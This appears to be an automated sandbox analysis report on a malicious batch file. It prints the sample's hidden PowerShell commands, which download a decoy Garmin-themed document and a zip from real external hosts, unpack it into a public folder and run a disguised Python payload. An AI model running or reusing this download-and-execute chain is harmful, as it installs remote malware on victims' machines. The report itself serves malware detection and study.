                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbe source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb@ source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.Core.pdbb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdbz source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdber source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: utomation.pdb source: powershell.exe, 00000010.00000002.1808397929.000001A329DC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1527759165.0000020CF620F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *on.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Hn.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb\2 source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbone-int.G source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb+ source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb( source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Qe.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 6?ll\System.Core.pdb% source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected Abobus Obfuscator
                  Source: Yara matchFile source: fghdsdf17.bat, type: SAMPLE
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFB4AFF7047 push esp; retf 12_2_00007FFB4AFF7048
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B011610 push eax; ret 16_2_00007FFB4B01161D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B012B58 pushad ; ret 16_2_00007FFB4B012B81
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFB4B0E23EC push 8B485F93h; iretd 16_2_00007FFB4B0E23F1

                  Persistence and Installation Behavior

                  barindex
                  Tries to download and execute files (via powershell)
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
